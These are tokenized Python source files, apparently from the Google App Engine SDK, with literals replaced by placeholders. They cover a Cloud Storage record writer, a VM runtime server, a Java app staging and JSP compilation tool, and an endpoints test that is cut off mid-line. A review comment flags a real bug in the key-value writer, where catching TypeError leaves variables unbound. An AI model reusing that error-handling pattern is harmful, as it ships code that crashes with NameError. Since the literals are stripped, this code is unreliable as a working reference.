_GoogleCloudStorageRecordOutputWriter ( <EOL> _GoogleCloudStorageRecordOutputWriterBase ) : <EOL> WRITER_CLS = _GoogleCloudStorageOutputWriter <EOL> GoogleCloudStorageRecordOutputWriter = _GoogleCloudStorageRecordOutputWriter <EOL> class GoogleCloudStorageConsistentRecordOutputWriter ( <EOL> _GoogleCloudStorageRecordOutputWriterBase ) : <EOL> WRITER_CLS = GoogleCloudStorageConsistentOutputWriter <EOL> # Serializes (key, value) pairs into KeyValue protos before record-writing them. <EOL> class _GoogleCloudStorageKeyValueOutputWriter ( <EOL> _GoogleCloudStorageRecordOutputWriter ) : <EOL> """<STR_LIT>""" <EOL> def write ( self , data ) : <EOL> if len ( data ) != <NUM_LIT:2> : <EOL> logging . error ( "<STR_LIT>" , <EOL> len ( data ) , data ) <EOL> try : <EOL> key = str ( data [ <NUM_LIT:0> ] ) <EOL> value = str ( data [ <NUM_LIT:1> ] ) <EOL> # NOTE(review): if this TypeError branch runs, key/value are never bound and set_key below raises NameError -- confirm whether an early return is intended here. <EOL> except TypeError : <EOL> logging . error ( "<STR_LIT>" , <EOL> data . __class__ . __name__ , data ) <EOL> proto = kv_pb . KeyValue ( ) <EOL> proto . set_key ( key ) <EOL> proto . set_value ( value ) <EOL> GoogleCloudStorageRecordOutputWriter . write ( self , proto . Encode ( ) ) <EOL> GoogleCloudStorageKeyValueOutputWriter = _GoogleCloudStorageKeyValueOutputWriter </s>
<s> """<STR_LIT>""" <EOL> from __future__ import with_statement <EOL> import logging <EOL> import SocketServer <EOL> import sys <EOL> import traceback <EOL> from wsgiref import simple_server <EOL> from google . appengine . api import appinfo_includes <EOL> from google . appengine . ext . vmruntime import meta_app <EOL> from google . appengine . ext . vmruntime import middlewares <EOL> from google . appengine . ext . vmruntime import vmconfig <EOL> from google . appengine . ext . vmruntime import vmstub <EOL> try : <EOL> import googleclouddebugger <EOL> except ImportError : <EOL> pass <EOL> LISTENING_HOST = '<STR_LIT>' <EOL> HTTP_PORT = <NUM_LIT> <EOL> class VmRuntimeServer ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , host , port , app , appinfo_external ) : <EOL> """<STR_LIT>""" <EOL> self . _host , self . _port = host , port <EOL> self . _app = app <EOL> self . _appinfo_external = appinfo_external <EOL> self . _server = self . CreateServer ( ) <EOL> logging . info ( '<STR_LIT>' , self . _host , self . _port ) <EOL> def RunForever ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def CreateServer ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> class VmRuntimeWSGIRefServer ( VmRuntimeServer ) : <EOL> def CreateServer ( self ) : <EOL> return simple_server . make_server ( <EOL> self . _host , self . _port , self . _app , <EOL> server_class = self . _ThreadingWSGIServer ) <EOL> def RunForever ( self ) : <EOL> try : <EOL> self . _server . serve_forever ( ) <EOL> except : <EOL> logging . error ( '<STR_LIT>' , self . _host , self . _port ) <EOL> raise <EOL> class _ThreadingWSGIServer ( SocketServer . ThreadingMixIn , <EOL> simple_server . WSGIServer ) : <EOL> daemon_threads = True <EOL> class VmRuntimeCherryPyServer ( VmRuntimeServer ) : <EOL> def CreateServer ( self ) : <EOL> from cherrypy . wsgiserver import wsgiserver2 <EOL> wsgiserver2 . socket_error_eintr . 
append ( <NUM_LIT> ) <EOL> return wsgiserver2 . CherryPyWSGIServer ( <EOL> ( self . _host , self . _port ) , self . _app , <EOL> numthreads = middlewares . MAX_CONCURRENT_REQUESTS , <EOL> request_queue_size = middlewares . MAX_CONCURRENT_REQUESTS ) <EOL> def RunForever ( self ) : <EOL> try : <EOL> self . _server . start ( ) <EOL> except : <EOL> logging . error ( '<STR_LIT>' , self . _host , self . _port ) <EOL> raise <EOL> class VmService ( object ) : <EOL> """<STR_LIT>""" <EOL> server_class = VmRuntimeWSGIRefServer <EOL> server_class = VmRuntimeCherryPyServer <EOL> def __init__ ( self , filename , host , port ) : <EOL> self . filename = filename <EOL> self . host = host <EOL> self . port = port <EOL> self . server = None <EOL> def CreateServer ( self ) : <EOL> with open ( self . filename ) as stream : <EOL> appinfo_external = appinfo_includes . Parse ( stream ) <EOL> appengine_config = vmconfig . BuildVmAppengineEnvConfig ( ) <EOL> vmstub . Register ( vmstub . VMStub ( appengine_config . default_ticket ) ) <EOL> if '<STR_LIT>' in sys . modules : <EOL> try : <EOL> googleclouddebugger . AttachDebugger ( ) <EOL> except Exception as e : <EOL> logging . warn ( '<STR_LIT>' , <EOL> traceback . format_exc ( e ) ) <EOL> try : <EOL> import appengine_config as user_appengine_config <EOL> except ImportError : <EOL> pass <EOL> app = meta_app . FullyWrappedApp ( appinfo_external , appengine_config ) <EOL> self . server = self . server_class ( self . host , self . port , app , <EOL> appinfo_external ) <EOL> logging . info ( '<STR_LIT>' , self . host , self . port ) <EOL> def StartServer ( self ) : <EOL> assert self . server <EOL> self . server . RunForever ( ) <EOL> def CreateAndRunService ( config_filename ) : <EOL> """<STR_LIT>""" <EOL> service = VmService ( config_filename , LISTENING_HOST , HTTP_PORT ) <EOL> service . CreateServer ( ) <EOL> service . StartServer ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import with_statement <EOL> import collections <EOL> import os . path <EOL> import re <EOL> import shutil <EOL> import stat <EOL> import subprocess <EOL> import sys <EOL> import tempfile <EOL> from google . appengine . datastore import datastore_index <EOL> from google . appengine . datastore import datastore_index_xml <EOL> from google . appengine . tools import app_engine_web_xml_parser <EOL> from google . appengine . tools import backends_xml_parser <EOL> from google . appengine . tools import cron_xml_parser <EOL> from google . appengine . tools import dispatch_xml_parser <EOL> from google . appengine . tools import dos_xml_parser <EOL> from google . appengine . tools import jarfile <EOL> from google . appengine . tools import java_quickstart <EOL> from google . appengine . tools import java_utils <EOL> from google . appengine . tools import queue_xml_parser <EOL> from google . appengine . tools import web_xml_parser <EOL> from google . appengine . tools import xml_parser_utils <EOL> from google . appengine . tools import yaml_translator <EOL> _CLASSES_JAR_NAME_PREFIX = '<STR_LIT>' <EOL> _COMPILED_JSP_JAR_NAME_PREFIX = '<STR_LIT>' <EOL> _LOCAL_JSPC_CLASS = '<STR_LIT>' <EOL> _MAX_COMPILED_JSP_JAR_SIZE = <NUM_LIT> * <NUM_LIT> * <NUM_LIT:5> <EOL> class Error ( Exception ) : <EOL> pass <EOL> class ConfigurationError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class CompileError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def IsWarFileWithoutYaml ( dir_path ) : <EOL> if os . path . isfile ( os . path . join ( dir_path , '<STR_LIT>' ) ) : <EOL> return False <EOL> web_inf = os . path . join ( dir_path , '<STR_LIT>' ) <EOL> return ( os . path . isdir ( web_inf ) and <EOL> set ( [ '<STR_LIT>' , '<STR_LIT>' ] ) . issubset ( os . listdir ( web_inf ) ) ) <EOL> def AddUpdateOptions ( parser ) : <EOL> """<STR_LIT>""" <EOL> parser . 
add_option ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> dest = '<STR_LIT>' , default = False , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> dest = '<STR_LIT>' , default = False , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , action = '<STR_LIT:store>' , <EOL> dest = '<STR_LIT>' , default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , action = '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , default = True , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> dest = '<STR_LIT>' , default = False , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> dest = '<STR_LIT>' , default = False , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> dest = '<STR_LIT>' , default = False , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , action = '<STR_LIT:store>' , <EOL> dest = '<STR_LIT>' , default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> class JavaAppUpdate ( object ) : <EOL> """<STR_LIT>""" <EOL> _JSP_REGEX = re . compile ( '<STR_LIT>' ) <EOL> _xml_parser = collections . namedtuple ( <EOL> '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> _XML_PARSERS = [ <EOL> _xml_parser ( '<STR_LIT>' , '<STR_LIT>' , <EOL> backends_xml_parser . GetBackendsYaml ) , <EOL> _xml_parser ( '<STR_LIT>' , '<STR_LIT>' , cron_xml_parser . GetCronYaml ) , <EOL> _xml_parser ( '<STR_LIT>' , '<STR_LIT>' , <EOL> dispatch_xml_parser . GetDispatchYaml ) , <EOL> _xml_parser ( '<STR_LIT>' , '<STR_LIT>' , dos_xml_parser . GetDosYaml ) , <EOL> _xml_parser ( '<STR_LIT>' , '<STR_LIT>' , queue_xml_parser . 
GetQueueYaml ) , <EOL> ] <EOL> _XML_VALIDATOR_CLASS = '<STR_LIT>' <EOL> def __init__ ( self , basepath , options ) : <EOL> self . basepath = os . path . abspath ( basepath ) <EOL> self . options = options <EOL> if not hasattr ( self . options , '<STR_LIT>' ) : <EOL> self . options . no_symlinks = True <EOL> java_home , exec_suffix = java_utils . JavaHomeAndSuffix ( ) <EOL> self . java_command = os . path . join ( java_home , '<STR_LIT>' , '<STR_LIT>' + exec_suffix ) <EOL> self . javac_command = os . path . join ( java_home , '<STR_LIT>' , '<STR_LIT>' + exec_suffix ) <EOL> self . _ValidateXmlFiles ( ) <EOL> self . app_engine_web_xml = self . _ReadAppEngineWebXml ( ) <EOL> self . app_engine_web_xml . app_root = self . basepath <EOL> if self . options . app_id : <EOL> self . app_engine_web_xml . app_id = self . options . app_id <EOL> if self . options . version : <EOL> self . app_engine_web_xml . version_id = self . options . version <EOL> quickstart = xml_parser_utils . BooleanValue ( <EOL> self . app_engine_web_xml . beta_settings . get ( '<STR_LIT>' , '<STR_LIT:false>' ) ) <EOL> if quickstart : <EOL> web_xml_str , _ = java_quickstart . quickstart_generator ( self . basepath ) <EOL> webdefault_xml_str = java_quickstart . get_webdefault_xml ( ) <EOL> web_xml_str = java_quickstart . remove_mappings ( <EOL> web_xml_str , webdefault_xml_str ) <EOL> self . web_xml = web_xml_parser . WebXmlParser ( ) . ProcessXml ( web_xml_str ) <EOL> else : <EOL> self . web_xml = self . _ReadWebXml ( ) <EOL> def _ValidateXmlFiles ( self ) : <EOL> sdk_dir = os . path . dirname ( jarfile . __file__ ) <EOL> xml_validator_jar = os . path . join ( <EOL> sdk_dir , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not os . path . exists ( xml_validator_jar ) : <EOL> print >> sys . stderr , ( '<STR_LIT>' <EOL> '<STR_LIT>' % xml_validator_jar ) <EOL> return <EOL> validator_args = [ ] <EOL> schema_dir = os . path . 
join ( sdk_dir , '<STR_LIT>' , '<STR_LIT>' ) <EOL> for schema_name in os . listdir ( schema_dir ) : <EOL> basename , extension = os . path . splitext ( schema_name ) <EOL> if extension == '<STR_LIT>' : <EOL> schema_file = os . path . join ( schema_dir , schema_name ) <EOL> xml_file = os . path . join ( self . basepath , '<STR_LIT>' , basename + '<STR_LIT>' ) <EOL> if os . path . exists ( xml_file ) : <EOL> validator_args += [ xml_file , schema_file ] <EOL> if validator_args : <EOL> command_and_args = [ <EOL> self . java_command , <EOL> '<STR_LIT>' , <EOL> xml_validator_jar , <EOL> self . _XML_VALIDATOR_CLASS , <EOL> ] + validator_args <EOL> status = subprocess . call ( command_and_args ) <EOL> if status : <EOL> raise ConfigurationError ( '<STR_LIT>' ) <EOL> def _ReadAppEngineWebXml ( self ) : <EOL> return self . _ReadAndParseXml ( <EOL> basepath = self . basepath , <EOL> file_name = '<STR_LIT>' , <EOL> parser = app_engine_web_xml_parser . AppEngineWebXmlParser ) <EOL> def _ReadWebXml ( self , basepath = None ) : <EOL> if not basepath : <EOL> basepath = self . basepath <EOL> return self . _ReadAndParseXml ( <EOL> basepath = basepath , <EOL> file_name = '<STR_LIT>' , <EOL> parser = web_xml_parser . WebXmlParser ) <EOL> def _ReadAndParseXml ( self , basepath , file_name , parser ) : <EOL> with open ( os . path . join ( basepath , '<STR_LIT>' , file_name ) ) as file_handle : <EOL> return parser ( ) . ProcessXml ( file_handle . read ( ) ) <EOL> def CreateStagingDirectory ( self , tools_dir ) : <EOL> """<STR_LIT>""" <EOL> stage_dir = tempfile . mkdtemp ( prefix = '<STR_LIT>' ) <EOL> static_dir = os . path . join ( stage_dir , '<STR_LIT>' ) <EOL> os . mkdir ( static_dir ) <EOL> self . _CopyOrLink ( self . basepath , stage_dir , static_dir , False ) <EOL> self . app_engine_web_xml . app_root = stage_dir <EOL> if self . options . compile_jsps : <EOL> self . _CompileJspsIfAny ( tools_dir , stage_dir ) <EOL> web_inf = os . path . 
join ( stage_dir , '<STR_LIT>' ) <EOL> web_inf_lib = os . path . join ( web_inf , '<STR_LIT>' ) <EOL> api_jar_dict = _FindApiJars ( web_inf_lib ) <EOL> api_versions = set ( api_jar_dict . values ( ) ) <EOL> if not api_versions : <EOL> api_version = None <EOL> elif len ( api_versions ) == <NUM_LIT:1> : <EOL> api_version = api_versions . pop ( ) <EOL> else : <EOL> raise ConfigurationError ( '<STR_LIT>' % <EOL> api_jar_dict ) <EOL> for staged_api_jar in api_jar_dict : <EOL> os . remove ( staged_api_jar ) <EOL> appengine_generated = os . path . join ( <EOL> stage_dir , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . _GenerateAppYaml ( stage_dir , api_version , appengine_generated ) <EOL> app_id = self . options . app_id or self . app_engine_web_xml . app_id <EOL> assert app_id , '<STR_LIT>' <EOL> for parser in self . _XML_PARSERS : <EOL> xml_name = os . path . join ( web_inf , parser . xml_name ) <EOL> if os . path . exists ( xml_name ) : <EOL> with open ( xml_name ) as xml_file : <EOL> xml_string = xml_file . read ( ) <EOL> yaml_string = parser . xml_to_yaml_function ( app_id , xml_string ) <EOL> yaml_file = os . path . join ( appengine_generated , parser . yaml_name ) <EOL> with open ( yaml_file , '<STR_LIT:w>' ) as yaml : <EOL> yaml . write ( yaml_string ) <EOL> indexes = [ ] <EOL> for xml_name in ( <EOL> '<STR_LIT>' , <EOL> os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> xml_name = os . path . join ( self . basepath , '<STR_LIT>' , xml_name ) <EOL> if os . path . exists ( xml_name ) : <EOL> with open ( xml_name ) as xml_file : <EOL> xml_string = xml_file . read ( ) <EOL> index_definitions = datastore_index_xml . IndexesXmlToIndexDefinitions ( <EOL> xml_string ) <EOL> indexes . extend ( index_definitions . indexes ) <EOL> if indexes : <EOL> yaml_string = datastore_index . IndexDefinitions ( indexes = indexes ) . ToYAML ( ) <EOL> yaml_file = os . path . join ( appengine_generated , '<STR_LIT>' ) <EOL> with open ( yaml_file , '<STR_LIT:w>' ) as yaml : <EOL> yaml . 
write ( yaml_string ) <EOL> return stage_dir <EOL> def GenerateAppYamlString ( self , static_file_list , api_version = None ) : <EOL> """<STR_LIT>""" <EOL> return yaml_translator . AppYamlTranslator ( <EOL> self . app_engine_web_xml , <EOL> self . web_xml , <EOL> static_file_list , <EOL> api_version ) . GetYaml ( ) <EOL> def _GenerateAppYaml ( self , stage_dir , api_version , appengine_generated ) : <EOL> """<STR_LIT>""" <EOL> static_file_list = self . _GetStaticFileList ( stage_dir ) <EOL> yaml_str = self . GenerateAppYamlString ( static_file_list , api_version ) <EOL> if not os . path . isdir ( appengine_generated ) : <EOL> os . mkdir ( appengine_generated ) <EOL> with open ( os . path . join ( appengine_generated , '<STR_LIT>' ) , '<STR_LIT:w>' ) as handle : <EOL> handle . write ( yaml_str ) <EOL> def _CopyOrLink ( self , source_dir , stage_dir , static_dir , inside_web_inf ) : <EOL> source_dir = os . path . abspath ( source_dir ) <EOL> stage_dir = os . path . abspath ( stage_dir ) <EOL> static_dir = os . path . abspath ( static_dir ) <EOL> for file_name in os . listdir ( source_dir ) : <EOL> file_path = os . path . join ( source_dir , file_name ) <EOL> if file_name . startswith ( '<STR_LIT:.>' ) or file_name == '<STR_LIT>' : <EOL> continue <EOL> if os . path . isdir ( file_path ) : <EOL> self . _CopyOrLink ( <EOL> file_path , <EOL> os . path . join ( stage_dir , file_name ) , <EOL> os . path . join ( static_dir , file_name ) , <EOL> inside_web_inf or file_name == '<STR_LIT>' ) <EOL> else : <EOL> if ( inside_web_inf <EOL> or self . app_engine_web_xml . IncludesResource ( file_path ) <EOL> or ( self . options . compile_jsps <EOL> and file_path . lower ( ) . endswith ( '<STR_LIT>' ) ) ) : <EOL> self . _CopyOrLinkFile ( file_path , os . path . join ( stage_dir , file_name ) ) <EOL> if ( not inside_web_inf <EOL> and self . app_engine_web_xml . IncludesStatic ( file_path ) ) : <EOL> self . _CopyOrLinkFile ( file_path , os . path . 
join ( static_dir , file_name ) ) <EOL> def _CopyOrLinkFile ( self , source , dest ) : <EOL> destdir = os . path . dirname ( dest ) <EOL> if not os . path . exists ( destdir ) : <EOL> os . makedirs ( destdir ) <EOL> if self . _ShouldSplitJar ( source ) : <EOL> self . _SplitJar ( source , destdir ) <EOL> elif source . endswith ( '<STR_LIT>' ) : <EOL> shutil . copy ( source , dest ) <EOL> os . chmod ( dest , os . stat ( dest ) . st_mode | stat . S_IWRITE ) <EOL> elif self . options . no_symlinks : <EOL> shutil . copy ( source , dest ) <EOL> else : <EOL> os . symlink ( source , dest ) <EOL> def _MoveDirectoryContents ( self , source_dir , dest_dir ) : <EOL> """<STR_LIT>""" <EOL> if not os . path . exists ( dest_dir ) : <EOL> os . mkdir ( dest_dir ) <EOL> for entry in os . listdir ( source_dir ) : <EOL> source_entry = os . path . join ( source_dir , entry ) <EOL> dest_entry = os . path . join ( dest_dir , entry ) <EOL> if os . path . exists ( dest_entry ) : <EOL> if os . path . isdir ( source_entry ) and os . path . isdir ( dest_entry ) : <EOL> self . _MoveDirectoryContents ( source_entry , dest_entry ) <EOL> else : <EOL> raise IOError ( '<STR_LIT>' % dest_entry ) <EOL> else : <EOL> shutil . move ( source_entry , dest_entry ) <EOL> _MAX_SIZE = <NUM_LIT:32> * <NUM_LIT:1000> * <NUM_LIT:1000> <EOL> def _ShouldSplitJar ( self , path ) : <EOL> return ( path . lower ( ) . endswith ( '<STR_LIT>' ) and self . options . do_jar_splitting and <EOL> os . path . getsize ( path ) >= self . _MAX_SIZE ) <EOL> def _SplitJar ( self , jar_path , dest_dir ) : <EOL> """<STR_LIT>""" <EOL> exclude_suffixes = ( <EOL> set ( self . options . jar_splitting_exclude_suffixes . split ( '<STR_LIT:U+002C>' ) ) - set ( [ '<STR_LIT>' ] ) ) <EOL> include = lambda name : not any ( name . endswith ( s ) for s in exclude_suffixes ) <EOL> jarfile . SplitJar ( jar_path , dest_dir , self . 
_MAX_SIZE , include ) <EOL> @ staticmethod <EOL> def _GetStaticFileList ( staging_dir ) : <EOL> return _FilesMatching ( os . path . join ( staging_dir , '<STR_LIT>' ) ) <EOL> def _CompileJspsIfAny ( self , tools_dir , staging_dir ) : <EOL> """<STR_LIT>""" <EOL> if self . _MatchingFileExists ( self . _JSP_REGEX , staging_dir ) : <EOL> gen_dir = tempfile . mkdtemp ( ) <EOL> try : <EOL> self . _CompileJspsWithGenDir ( tools_dir , staging_dir , gen_dir ) <EOL> finally : <EOL> shutil . rmtree ( gen_dir ) <EOL> def _CompileJspsWithGenDir ( self , tools_dir , staging_dir , gen_dir ) : <EOL> staging_web_inf = os . path . join ( staging_dir , '<STR_LIT>' ) <EOL> lib_dir = os . path . join ( staging_web_inf , '<STR_LIT>' ) <EOL> for jar_file in GetUserJspLibFiles ( tools_dir ) : <EOL> self . _CopyOrLinkFile ( <EOL> jar_file , os . path . join ( lib_dir , os . path . basename ( jar_file ) ) ) <EOL> for jar_file in GetSharedJspLibFiles ( tools_dir ) : <EOL> self . _CopyOrLinkFile ( <EOL> jar_file , os . path . join ( lib_dir , os . path . basename ( jar_file ) ) ) <EOL> classes_dir = os . path . join ( staging_web_inf , '<STR_LIT>' ) <EOL> generated_web_xml = os . path . join ( staging_web_inf , '<STR_LIT>' ) <EOL> classpath = self . _GetJspClasspath ( tools_dir , classes_dir , gen_dir ) <EOL> command_and_args = [ <EOL> self . java_command , <EOL> '<STR_LIT>' , classpath , <EOL> _LOCAL_JSPC_CLASS , <EOL> '<STR_LIT>' , staging_dir , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , generated_web_xml , <EOL> '<STR_LIT>' , gen_dir , <EOL> '<STR_LIT>' , self . options . compile_encoding , <EOL> ] <EOL> status = subprocess . call ( command_and_args ) <EOL> if status : <EOL> raise CompileError ( <EOL> '<STR_LIT>' % status ) <EOL> self . _CompileJavaFiles ( classpath , staging_web_inf , gen_dir ) <EOL> self . web_xml = self . 
_ReadWebXml ( staging_dir ) <EOL> def _CompileJavaFiles ( self , classpath , web_inf , jsp_class_dir ) : <EOL> """<STR_LIT>""" <EOL> java_files = _FilesMatching ( jsp_class_dir , lambda f : f . endswith ( '<STR_LIT>' ) ) <EOL> if not java_files : <EOL> return <EOL> command_and_args = [ <EOL> self . javac_command , <EOL> '<STR_LIT>' , classpath , <EOL> '<STR_LIT>' , jsp_class_dir , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , self . options . compile_encoding , <EOL> ] + java_files <EOL> status = subprocess . call ( command_and_args ) <EOL> if status : <EOL> raise CompileError ( <EOL> '<STR_LIT>' % status ) <EOL> if self . options . jar_jsps : <EOL> self . _ZipJasperGeneratedFiles ( web_inf , jsp_class_dir ) <EOL> else : <EOL> web_inf_classes = os . path . join ( web_inf , '<STR_LIT>' ) <EOL> self . _MoveDirectoryContents ( jsp_class_dir , web_inf_classes ) <EOL> if self . options . delete_jsps : <EOL> jsps = _FilesMatching ( os . path . dirname ( web_inf ) , <EOL> lambda f : f . endswith ( '<STR_LIT>' ) ) <EOL> for f in jsps : <EOL> os . remove ( f ) <EOL> if self . options . do_jar_classes : <EOL> self . _ZipWebInfClassesFiles ( web_inf ) <EOL> @ staticmethod <EOL> def _ZipJasperGeneratedFiles ( web_inf , jsp_class_dir ) : <EOL> lib_dir = os . path . join ( web_inf , '<STR_LIT>' ) <EOL> jarfile . Make ( jsp_class_dir , lib_dir , _COMPILED_JSP_JAR_NAME_PREFIX , <EOL> maximum_size = _MAX_COMPILED_JSP_JAR_SIZE , <EOL> include_predicate = lambda name : not name . endswith ( '<STR_LIT>' ) ) <EOL> @ staticmethod <EOL> def _ZipWebInfClassesFiles ( web_inf ) : <EOL> lib_dir = os . path . join ( web_inf , '<STR_LIT>' ) <EOL> classes_dir = os . path . join ( web_inf , '<STR_LIT>' ) <EOL> jarfile . Make ( classes_dir , lib_dir , _CLASSES_JAR_NAME_PREFIX , <EOL> maximum_size = _MAX_COMPILED_JSP_JAR_SIZE ) <EOL> shutil . rmtree ( classes_dir ) <EOL> os . 
mkdir ( classes_dir ) <EOL> @ staticmethod <EOL> def _GetJspClasspath ( tools_dir , classes_dir , gen_dir ) : <EOL> """<STR_LIT>""" <EOL> lib_dir = os . path . join ( os . path . dirname ( classes_dir ) , '<STR_LIT>' ) <EOL> elements = ( <EOL> GetImplLibs ( tools_dir ) + GetSharedLibFiles ( tools_dir ) + <EOL> [ classes_dir , gen_dir ] + <EOL> _FilesMatching ( <EOL> lib_dir , lambda f : f . endswith ( '<STR_LIT>' ) or f . endswith ( '<STR_LIT>' ) ) ) <EOL> return ( os . pathsep ) . join ( elements ) <EOL> @ staticmethod <EOL> def _MatchingFileExists ( regex , dir_path ) : <EOL> for _ , _ , files in os . walk ( dir_path ) : <EOL> for f in files : <EOL> if re . search ( regex , f ) : <EOL> return True <EOL> return False <EOL> def GetImplLibs ( tools_dir ) : <EOL> return _GetLibsShallow ( os . path . join ( tools_dir , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def GetSharedLibFiles ( tools_dir ) : <EOL> return _GetLibsRecursive ( os . path . join ( tools_dir , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def GetUserJspLibFiles ( tools_dir ) : <EOL> return _GetLibsRecursive ( <EOL> os . path . join ( tools_dir , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def GetSharedJspLibFiles ( tools_dir ) : <EOL> return _GetLibsRecursive ( <EOL> os . path . join ( tools_dir , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def _GetLibsRecursive ( dir_path ) : <EOL> return _FilesMatching ( dir_path , lambda f : f . endswith ( '<STR_LIT>' ) ) <EOL> def _GetLibsShallow ( dir_path ) : <EOL> libs = [ ] <EOL> for f in os . listdir ( dir_path ) : <EOL> if os . path . isfile ( os . path . join ( dir_path , f ) ) and f . endswith ( '<STR_LIT>' ) : <EOL> libs . append ( os . path . join ( dir_path , f ) ) <EOL> return libs <EOL> def _FilesMatching ( root , predicate = lambda f : True ) : <EOL> """<STR_LIT>""" <EOL> matches = [ ] <EOL> for path , _ , files in os . walk ( root ) : <EOL> matches += [ os . path . 
join ( path , f ) for f in files if predicate ( f ) ] <EOL> return matches <EOL> def _FindApiJars ( lib_dir ) : <EOL> """<STR_LIT>""" <EOL> result = { } <EOL> for jar_file in _FilesMatching ( lib_dir , lambda f : f . endswith ( '<STR_LIT>' ) ) : <EOL> manifest = jarfile . ReadManifest ( jar_file ) <EOL> if manifest : <EOL> section = manifest . sections . get ( '<STR_LIT>' ) <EOL> if section and '<STR_LIT>' in section : <EOL> result [ jar_file ] = section [ '<STR_LIT>' ] <EOL> return result </s>
<s> """<STR_LIT>""" <EOL> import httplib <EOL> import json <EOL> import logging <EOL> import unittest <EOL> import google <EOL> import mox <EOL> from google . appengine . tools . devappserver2 import dispatcher <EOL> from google . appengine . tools . devappserver2 . endpoints import api_config_manager <EOL> from google . appengine . tools . devappserver2 . endpoints import api_request <EOL> from google . appengine . tools . devappserver2 . endpoints import discovery_api_proxy <EOL> from google . appengine . tools . devappserver2 . endpoints import endpoints_server <EOL> from google . appengine . tools . devappserver2 . endpoints import errors <EOL> from google . appengine . tools . devappserver2 . endpoints import test_utils <EOL> class JsonMatches ( mox . Comparator ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , json_object ) : <EOL> """<STR_LIT>""" <EOL> self . _json_object = json_object <EOL> def equals ( self , json_string ) : <EOL> """<STR_LIT>""" <EOL> other_json = json . loads ( json_string ) <EOL> return self . _json_object == other_json <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % self . _json_object <EOL> class DevAppserverEndpointsServerTest ( test_utils . TestsWithStartResponse ) : <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( DevAppserverEndpointsServerTest , self ) . setUp ( ) <EOL> self . mox = mox . Mox ( ) <EOL> self . config_manager = api_config_manager . ApiConfigManager ( ) <EOL> self . mock_dispatcher = self . mox . CreateMock ( dispatcher . Dispatcher ) <EOL> self . server = endpoints_server . EndpointsDispatcher ( self . mock_dispatcher , <EOL> self . config_manager ) <EOL> def tearDown ( self ) : <EOL> self . mox . UnsetStubs ( ) <EOL> def prepare_dispatch ( self , config ) : <EOL> request_method = '<STR_LIT:POST>' <EOL> request_path = '<STR_LIT>' <EOL> request_headers = [ ( '<STR_LIT:Content-Type>' , '<STR_LIT:application/json>' ) ] <EOL> request_body = '<STR_LIT:{}>' <EOL> response_body = json . 
dumps ( { '<STR_LIT>' : [ config ] } ) <EOL> self . mock_dispatcher . add_request ( <EOL> request_method , request_path , request_headers , request_body , <EOL> endpoints_server . _SERVER_SOURCE_IP ) . AndReturn ( <EOL> dispatcher . ResponseTuple ( '<STR_LIT>' , <EOL> [ ( '<STR_LIT:Content-Type>' , '<STR_LIT:application/json>' ) , <EOL> ( '<STR_LIT>' , <EOL> str ( len ( response_body ) ) ) ] , <EOL> response_body ) ) <EOL> def assert_dispatch_to_spi ( self , request , config , spi_path , <EOL> expected_spi_body_json = None ) : <EOL> """<STR_LIT>""" <EOL> self . prepare_dispatch ( config ) <EOL> spi_headers = [ ( '<STR_LIT:Content-Type>' , '<STR_LIT:application/json>' ) ] <EOL> spi_body_json = expected_spi_body_json or { } <EOL> spi_response = dispatcher . ResponseTuple ( '<STR_LIT>' , [ ] , '<STR_LIT>' ) <EOL> self . mock_dispatcher . add_request ( <EOL> '<STR_LIT:POST>' , spi_path , spi_headers , JsonMatches ( spi_body_json ) , <EOL> request . source_ip ) . AndReturn ( spi_response ) <EOL> self . mox . StubOutWithMock ( self . server , '<STR_LIT>' ) <EOL> self . server . handle_spi_response ( <EOL> mox . IsA ( api_request . ApiRequest ) , mox . IsA ( api_request . ApiRequest ) , <EOL> spi_response , mox . IsA ( dict ) , self . start_response ) . AndReturn ( '<STR_LIT>' ) <EOL> self . mox . ReplayAll ( ) <EOL> response = self . server . dispatch ( request , self . start_response ) <EOL> self . mox . VerifyAll ( ) <EOL> self 